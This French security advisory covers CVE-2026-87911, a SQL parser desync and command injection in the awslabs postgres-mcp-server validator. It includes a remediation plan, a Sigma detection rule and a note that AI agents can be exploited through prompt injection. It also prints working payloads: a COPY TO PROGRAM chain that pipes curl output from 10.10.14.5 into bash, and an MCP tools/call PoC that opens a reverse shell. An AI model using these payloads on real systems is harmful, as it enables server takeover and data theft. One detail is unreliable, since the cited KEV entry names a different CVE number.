CVE-2026-87911 : désynchronisation de parseur SQL et injection de commandes dans awslabs postgres-MCP-Server
SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE
Cible :awslabs postgres-mcp-server (awslabs.postgres_mcp_server.sql_validator) Le CVSS v3.1 attribue la note de 9.6 (Critique) et le score Hermes Threat Score s'établit à 96 (CRITIQUE). L'exploitation directe via injection de prompt ou appel d'outil MCP mène à l'exécution de commandes système sur le serveur PostgreSQL hébergeant les données d'entreprise.
CVE-2026-87911: awslabs postgres-mcp-server SQL Parser Desync to Command InjectionVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in AWS MCP Server Suite documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice d’impact
Section intitulée « 1. Contexte technique & matrice d’impact »| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-87911 | Menaces IA Agentique & Protocole MCP |
| Produit ciblé | awslabs postgres-mcp-server | Amazon Web Services / MCP Community |
| Composant affecté | awslabs.postgres_mcp_server.sql_validator | Orchestrateur et couche d’outils agentiques |
| Nature de la faille | CWE-78: OS Command Injection / CWE-89: SQL Injection | Violation d’intégrité et d’exécution |
| Versions vulnérables | all versions prior to 1.1.7 | Environnements en production |
| Correctif disponible | 1.1.7 | Mise à jour impérative |
2. Analyse technique approfondie
Section intitulée « 2. Analyse technique approfondie »Mécanique de la désynchronisation de parseur
Section intitulée « Mécanique de la désynchronisation de parseur »Le validateur vérifiait la requête via une regex rudimentaire :
re.match(r"^\s*SELECT\b", query, re.IGNORECASE)
Un attaquant peut structurer un payload où un SELECT valide précède une seconde instruction chaînée :
SELECT $$safe_block$$; COPY (SELECT '') TO PROGRAM 'curl -s http://10.10.14.5:8000/rev | bash'; --La couche MCP transmettait la chaîne brute au pilote asyncpg.execute(), exécutant la directive shell sans avertissement.
+----------------------------------------------------------------------------------------------------+| CYCLE D'ATTAQUE CVE-2026-87911 |+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt] │ │ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur ▼ [awslabs postgres-mcp-server] │ ├───► 1. Ingestion par awslabs.postgres_mcp_server.sql_validator │ - Échec de validation, absence de filtrage ou contournement de sandbox │ ├───► 2. Exécution / Mutation d'état │ - Exécution de commandes OS ou exfiltration d'identifiants │ ▼ [Infrastructure Cible Compromise] │ └───► Vol de données, prise de contrôle du serveur ou persistance+----------------------------------------------------------------------------------------------------+3. Preuve de concept (PoC) & analyse du payload
Section intitulée « 3. Preuve de concept (PoC) & analyse du payload »{ "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "execute_sql", "arguments": { "query": "SELECT $$validation_test$$; COPY (SELECT 'exfil') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.14.5/9001 0>&1"'; --" } }}4. Ingénierie de détection & télémétrie
Section intitulée « 4. Ingénierie de détection & télémétrie »Règle de détection Sigma
Section intitulée « Règle de détection Sigma »title: PostgreSQL MCP Server COPY TO PROGRAM Executionid: 87911c01-e911-4a1b-9f22-mcppostgrescmd01status: highdescription: Detects invocation of PostgreSQL COPY TO PROGRAM commands through MCP database server tools.author: Hermes Codex Detection Engineeringdate: 2026-09-06logsource: product: postgresql service: query_logdetection: selection: statement|contains: - 'COPY' - 'TO PROGRAM' condition: selectionlevel: critical5. Guide de remédiation & plan d’action
Section intitulée « 5. Guide de remédiation & plan d’action »- Appliquer les correctifs : mettre à jour
awslabs postgres-mcp-serververs la version1.1.7sans délai. - Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
- Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
- Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.